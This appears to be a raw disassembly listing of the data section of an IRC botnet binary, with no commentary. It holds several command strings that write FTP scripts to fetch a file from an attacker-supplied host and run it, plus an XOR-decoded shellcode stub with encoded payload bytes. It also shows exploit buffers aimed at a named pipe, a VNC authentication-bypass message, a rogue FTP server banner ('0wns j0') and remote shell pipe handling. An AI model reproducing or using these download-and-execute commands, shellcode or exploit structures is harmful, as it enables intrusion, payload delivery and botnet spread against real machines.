dword_448E38 dd 62B0606h, 2050501h ; DATA XREF: sub_40D24D+2F5�o
aA_1: ; DATA XREF: sub_40D24D+320�o
unicode 0, <`>,0
align 4
aCmdCEchoOpenSD db 'cmd /c echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &'
; DATA XREF: _0:0040DA70�o
db 'echo quit >> o &ftp -n -s:o &%s',0Dh,0Ah,0
align 10h
dword_448EB0 dd 0E983C933h, 0D9EED9AFh, 5BF42474h ; DATA XREF: sub_40E29B+2A9�o
; ---------------------------------------------------------------------------
loc_448EBC: ; CODE XREF: _2:00448EC6�j
xor dword ptr [ebx+13h], 6AD31EBBh
sub ebx, 0FFFFFFFCh
loop loc_448EBC
inc edi
jz short loc_448F03
and eax, 952CE753h
inc esp
jle short loc_448F2B
push es
lahf
cmp bl, [eax+2Fh]
xchg edx, [ebp+1FC36FAFh]
cmp al, 0E1h
; ---------------------------------------------------------------------------
dd 355806F4h, 89381F9Bh, 5E58578Bh, 5B3D1F30h, 0EE7F877Bh
dd 0ABD46A7Bh, 0A8D21371h, 3EE8EA50h
; ---------------------------------------------------------------------------
lahf
cmps byte ptr ss:[esi], byte ptr es:[edi]
loc_448F03: ; CODE XREF: _2:00448EC9�j
mov [eax], esi
inc ecx
imul dword ptr [ebx+50h]
js short near ptr loc_448F62+1
lock xchg ax, bp
; ---------------------------------------------------------------------------
dw 768Ch
dd 46D0F5BAh, 4EBF9730h, 5B107FA7h, 2A587A7Bh, 6693958Bh
dd 0C7CF6E30h
; ---------------------------------------------------------------------------
loc_448F28: ; CODE XREF: _2:00448F55�j
xor [esi-25h], bl
loc_448F2B: ; CODE XREF: _2:00448ED1�j
xor al, 0D3h
nop
popf
db 64h
push edi
dec esi
sub al, 0BCh
mov al, ch
mov ch, 39h
fnsave byte ptr [esi-20h]
pop eax
shr dword ptr [ecx-60h], cl
pop eax
in al, 4Ah
sub al, 0BAh
loc_448F44: ; CODE XREF: _2:00448F77�j
rcl ebp, cl
db 3Eh
xchg eax, esi
or byte ptr [esi+2Ch], 0BCh
in al, 97h
db 36h
or al, 3Ah
rep fld tbyte ptr [eax-12h]
jz short loc_448F28
xchg eax, ebp
imul esi, [esi+0Ah], 63h
dec esi
mov bl, 84h
xchg eax, ebp
insd
dec ebp
loc_448F62: ; CODE XREF: _2:00448F09�j
cmp byte ptr [ecx], 0E8h
dec ebp
nop
cmp eax, edi
dec ebp
sub al, 0BAh
fnsave byte ptr [esi-2Dh]
paddusw mm1, qword ptr [ebp+5Ah]
mov ebp, [esi]
jbe short loc_448FEE
jo short loc_448F44
fld dword ptr [ebp+edx*4+3BC3746Dh]
out dx, al
loope near ptr loc_448F85+1
add bl, [edi]
loc_448F85: ; CODE XREF: _2:00448F81�j
mov bl, 0FDh
sub esp, 0FFFFFFE1h
add eax, 3E1EE39h
add bl, [esi+57h]
push ebp
and ebp, esp
loope near ptr loc_448F9A+2
cmp ch, bh
dec edx
loc_448F9A: ; CODE XREF: _2:00448F95�j
xchg dl, [ebp-72447295h]
retn 0AAD8h
; ---------------------------------------------------------------------------
db 3Dh
dd 9586C844h, 0EB9786Bh, 7B076DDh, 3AB9FB32h, 0E31F37E2h
dd 0E397745Ch, 99132F59h, 4791E011h, 0F9FF5C45h, 0C1EB6436h
dd 18BBB510h, 95C5AD45h, 0BC2C5ACEh, 3B8149E0h, 6BB94FEAh
dd 3B864FEAh, 0C7BBCE44h, 391D1B62h
db 44h, 0C8h
; ---------------------------------------------------------------------------
loc_448FEE: ; CODE XREF: _2:00448F75�j
mov ecx, 2C294495h
mov edx, 0E92F4930h
jg short near ptr dword_449074
sub al, 0BCh
jmp near ptr 544693E2h
; ---------------------------------------------------------------------------
db 0D0h, 33h, 0Ah
dd 9505E1E8h, 6AD31E6Bh, 0
dword_449010 dd 0EFFFC481h, 44FFFFh, 646E6957h, 2073776Fh, 2C34544Eh
; DATA XREF: sub_40E29B+290�o
; _2:0044904C�o
dd 30303220h, 53282030h, 532D3050h, 293450h, 646E6957h
dd 2073776Fh, 28205058h, 2B305053h, 29315053h, 0
dd offset dword_449010+8
dword_449050 dd 42Ah ; DATA XREF: sub_40E29B+239�r
dword_449054 dd 3E8h ; DATA XREF: sub_40E29B+2B4�r
dword_449058 dd 258h ; DATA XREF: sub_40E29B+286�r
byte_44905C db 1 ; DATA XREF: sub_40E29B+1EB�r
; sub_40E29B+2C2�r
align 10h
dd offset dword_449010+24h
dd 2C6h, 264h, 0
dd 1
dword_449074 dd 20804h ; CODE XREF: _2:00448FF8�j
; DATA XREF: sub_40E19F�r ...
dword_449078 dd 2Eh ; DATA XREF: sub_40E29B+10�o
dword_44907C dd 73255C5Ch, 6370695Ch, 24h ; DATA XREF: sub_40E29B+33�o
aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_40E29B+7D�o
align 4
dword_44909C dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_40E29B+DA�o
dword_4490B0 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; DATA XREF: sub_40E29B+14A�o
; ---------------------------------------------------------------------------
loc_4490C4: ; DATA XREF: sub_40E29B+20D�o
jmp short near ptr dword_4490C8
; ---------------------------------------------------------------------------
align 4
dword_4490C8 dd 2 dup(0) ; CODE XREF: _2:loc_4490C4�j
aCmdCEchoOpen_0 db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>'
; DATA XREF: sub_40E794+92�o
db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
align 8
dword_449148 dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_40E9ED+5A�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
dd 3Fh dup(22222222h), 1222222h, 64646401h, 3Fh dup(64646464h)
dd 1016464h, 40h dup(65656565h), 66010165h, 40h dup(66666666h)
dd 67670101h, 3Fh dup(67676767h), 1676767h, 68686801h
dd 3Fh dup(68686868h), 1016868h, 40h dup(69696969h), 6A010169h
dd 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh), 16B6B6Bh
dd 6C6C6C01h, 8 dup(6C6C6C6Ch), 41416C6Ch, 100D06EBh, 6D6D501Eh
dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h, 83877FD9h
dd 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h, 0C2F4FDECh
dd 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h, 86F4ED43h
dd 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h, 0AF5B8DF3h
dd 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h, 0EF4F5CBh
dd 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h, 0C7F474D4h
dd 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh, 0B50CAEA0h
dd 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h, 85773449h
dd 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh, 0D43C8A9Bh
dd 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh, 78281EB8h
dd 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh, 0EFAF269Dh
dd 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h, 0D0061FB1h
dd 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h, 0EB3F091h
dd 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h, 2C47A345h
dd 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h, 86158899h
dd 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h, 5780EE37h
dd 4838E43h, 5180BD0Ch, 0EFAF269Ah, 0D87B5338h, 78A9269Bh
dd 877FD918h
aMmmmmmmmmmmmmm db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
align 10h
aCmdCEchoOpen_1 db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>'
; DATA XREF: sub_40E8D6+92�o
db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
word_44A3D4 dw 1 ; DATA XREF: _0:0040EB28�r
align 4
dword_44A3D8 dd 20424652h, 64333025h, 3330252Eh, 0A64h ; DATA XREF: _0:0040EBB4�o
aVncD_DSSAuthby db 'VNC%d.%d %s: %s - [AuthBypass]',0 ; DATA XREF: _0:0040ED51�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40EE63+130�o
aEchoOpenSDOEch db 'echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o'
; DATA XREF: sub_40F04F+23E�o
db ' &echo bye >>o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_40F2F1+1B9�o
align 4
aSS_1 db '%s %s',0 ; DATA XREF: sub_40F2F1+237�o
align 10h
aUser_1 db 'USER',0 ; DATA XREF: sub_40F2F1+248�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_40F2F1+25D�o
align 10h
aPass db 'PASS',0 ; DATA XREF: sub_40F2F1+26D�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_40F2F1+281�o
align 10h
aSyst db 'SYST',0 ; DATA XREF: sub_40F2F1+291�o
align 4
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_40F2F1+2A5�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_40F2F1+2B5�o
align 10h
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_40F2F1+2C9�o
align 4
off_44A514 dd offset aKassower+8 ; DATA XREF: sub_40F2F1+2D9�o
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_40F2F1+2ED�o
align 4
aType db 'TYPE',0 ; DATA XREF: sub_40F2F1+2FD�o
align 2
aA_0 db 'A',0 ; DATA XREF: sub_40F2F1+314�o
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_40F2F1+328�o
aType_0 db 'TYPE',0 ; DATA XREF: sub_40F2F1+338�o
align 2
aI_0 db 'I',0 ; DATA XREF: sub_40F2F1+34F�o
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_40F2F1+363�o
aPasv db 'PASV',0 ; DATA XREF: sub_40F2F1+373�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_40F2F1+386�o
align 4
aList_0 db 'LIST',0 ; DATA XREF: sub_40F2F1+3C1�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_40F2F1+3D4�o
align 4
aPort db 'PORT',0 ; DATA XREF: sub_40F2F1+402�o
align 4
aS_13 db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_40F2F1+43B�o
db ']',0
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_40F2F1+47F�o
align 4
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_40F2F1+4B2�o
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_40F2F1+4C3�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_40F2F1+4D3�o
align 10h
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_40F2F1+4EB�o
align 4
aFtpTransferSta db 'ftp transfer started to: %s',0 ; DATA XREF: sub_40F2F1+514�o
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_40F2F1+55E�o
aFtpTransferCom db 'ftp transfer complete to: %s',0 ; DATA XREF: sub_40F2F1+570�o
align 10h
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_40F2F1+5C1�o
align 4
aQuit_1 db 'QUIT',0 ; DATA XREF: sub_40F2F1+5CE�o
align 4
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_40F2F1+5E2�o
aRb db 'rb',0 ; DATA XREF: sub_40F986+24�o
align 10h
aGet_0 db 'GET ',0 ; DATA XREF: sub_40FA20+25E�o
align 2
asc_44A706 db ' ',0 ; DATA XREF: sub_40FA20+281�o
asc_44A708: ; DATA XREF: sub_40FA20+286�o
unicode 0, < >,0
aGet_1 db 'GET ',0 ; DATA XREF: sub_40FA20+291�o
align 4
asc_44A714 db 0Dh,0Ah,0 ; DATA XREF: sub_40FA20+2C4�o
align 4
unk_44A718 db 2Dh ; - ; DATA XREF: sub_40FA20+3D9�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerFailedRe db ' server failed, returned %d',0
aTextHtml db 'text/html',0 ; DATA XREF: sub_40FE5C+64�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_40FE5C:loc_40FEC7�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_40FE5C+83�o
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_40FE5C+97�o
align 4
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40FE5C+D3�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 8
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40FE5C+F0�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aS_14 db '\%s',0 ; DATA XREF: sub_40FFD8+2F�o
aS_15 db '%s',0 ; DATA XREF: sub_40FFD8+39�o
align 10h
aSS_2 db '%s%s',0 ; DATA XREF: sub_40FFD8+E9�o
align 2
asc_44A966 db 0Ah,0 ; DATA XREF: sub_40FFD8+FA�o
asc_44A968: ; DATA XREF: sub_40FFD8+156�o
unicode 0, <*>,0
unk_44A96C db 2Dh ; - ; DATA XREF: sub_40FFD8+20A�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aWorkerThreadOf db ' worker thread of server thread: %d.',0
align 10h
dword_44A9A0 dd 234032Dh, 70747468h, 2D030264h, 69616620h, 2064656Ch
; DATA XREF: sub_40FFD8+27C�o
dd 73206F74h, 74726174h, 726F7720h, 2072656Bh, 65726874h
dd 202C6461h, 6F727265h, 64252072h
db 2 dup(0)
word_44A9D6 dw 0Ah ; DATA XREF: sub_410287+29�o
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_410287+4B�o
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_410287+77�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_410287+AC�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 8
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_410287+F6�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_410287+12A�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_410287+146�o
align 8
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_410287+1BF�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
a__ db '..',0 ; DATA XREF: sub_410287+231�o
align 10h
a__1: ; DATA XREF: sub_410287+24C�o
unicode 0, <.>,0
aPm_0 db 'PM',0 ; DATA XREF: sub_410287+284�o
align 4
aAm db 'AM',0 ; DATA XREF: sub_410287+293�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_410287+2B4�o
aS_16 db '<%s>',0 ; DATA XREF: sub_410287+2DE�o
align 4
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_410287+308�o
align 10h
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_410287+335�o
db '<TD WIDTH="%d"><A HREF="',0
align 10h
aSS_3 db '%s%s/',0 ; DATA XREF: sub_410287+379�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_410287+3C6�o
align 4
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_410287:loc_410654�o
align 10h
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_410287+406�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aS_17 db '<%s>',0 ; DATA XREF: sub_410287+418�o
align 10h
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_410287+439�o
align 10h
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_410287+476�o
align 4
aTrTdWidthDAH_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_410287+48B�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
aSS_4 db '%s%s',0 ; DATA XREF: sub_410287+4CF�o
align 10h
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_410287+51C�o
align 10h
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_410287:loc_4107AA�o
align 4
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_410287+566�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_410287+58E�o
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_410287+61D�o
align 10h
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_410287+638�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_410287+64D�o
align 10h
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_4109F3+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
dword_44AEB8 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_410B14+BB�o
aClientConnecti db '- client connection from %s:%d.',0
aUseridUnixS db ' : USERID : UNIX : %s',0Dh,0Ah,0 ; DATA XREF: sub_410B14+113�o
dword_44AEFC dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_410B14+16E�o
aServerFailed_0 db '- server failed, returned %d',0
align 4
unk_44AF28 db 2Dh ; - ; DATA XREF: sub_410CBF+E9�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aClientConnec_0 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 10h
unk_44AF70 db 2Dh ; - ; DATA XREF: sub_410CBF+14B�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToSta_39 db 'Failed to start client thread, error: <%d>.',0
align 10h
unk_44AFB0 db 2Dh ; - ; DATA XREF: sub_410E4F+E1�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aClientConnec_1 db 'Client connection to IP: %s:%d, Server thread: %d.',0
align 8
unk_44AFF8 db 2Dh ; - ; DATA XREF: sub_410E4F+157�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aFailedToSta_40 db 'Failed to start connection thread, error: <%d>.',0
unk_44B038 db 2Dh ; - ; DATA XREF: sub_4110D4+E1�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorGetpeerna db '- Error: getpeername(): <%d>.',0
align 4
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_4110D4+172�o
align 4
unk_44B078 db 2Dh ; - ; DATA XREF: sub_4110D4+1A2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedInS@ db '- User logged in: <%s@%s>.',0
unk_44B0A0 db 2Dh ; - ; DATA XREF: sub_4110D4+1C2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorSessionru db '- Error: SessionRun(): <%d>.',0
align 4
unk_44B0CC db 2Dh ; - ; DATA XREF: sub_4110D4+1E9�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedOutS db '- User logged out: <%s@%s>.',0
align 4
unk_44B0F8 db 2Dh ; - ; DATA XREF: sub_4112D9:loc_41130B�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aProtocolString db '- Protocol string too long.',0
align 4
unk_44B124 db 2Dh ; - ; DATA XREF: sub_41131A+1B�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aLoginRejectedR db '- Login rejected, Remote user: <%s@%s>.',0
align 4
unk_44B15C db 2Dh ; - ; DATA XREF: sub_411349+3D�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorWsastartu db '- Error: WSAStartup(): <%d>.',0
align 4
unk_44B188 db 2Dh ; - ; DATA XREF: sub_411349+70�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToInstal db '- Failed to install control-C handler, error: <%d>.',0
align 4
unk_44B1CC db 2Dh ; - ; DATA XREF: sub_411349+106�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aReadyAndWaitin db '- Ready and waiting for incoming connections.',0
align 4
unk_44B208 db 2Dh ; - ; DATA XREF: sub_411349+177�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aClientConnec_2 db '- Client connection from IP: %s:%d, Server thread: %d.',0
unk_44B24C db 2Dh ; - ; DATA XREF: sub_411349+1E8�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToSta_41 db '- Failed to start client thread, error: <%d>.',0
align 4
unk_44B288 db 2Dh ; - ; DATA XREF: sub_411349+218�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorServerFai db '- Error: server failed, returned: <%d>.',0
align 10h
unk_44B2C0 db 2Dh ; - ; DATA XREF: sub_4115D0+59�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCreate db '- Failed to create ReadShell session thread, error: <%d>.',0
align 4
unk_44B308 db 2Dh ; - ; DATA XREF: sub_4115D0+8F�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_0 db '- Failed to create ReadShell session thread, error: <%d>.',0
align 10h
unk_44B350 db 2Dh ; - ; DATA XREF: sub_4115D0+E2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aWaitformultipl db '- WaitForMultipleObjects error: <%d>.',0
align 8
unk_44B388 db 2Dh ; - ; DATA XREF: sub_411725+5C�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_1 db '- Failed to create shell stdout pipe, error: <%d>.',0
unk_44B3C8 db 2Dh ; - ; DATA XREF: sub_411725+7E�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_2 db '- Failed to create shell stdin pipe, error: <%d>.',0
align 4
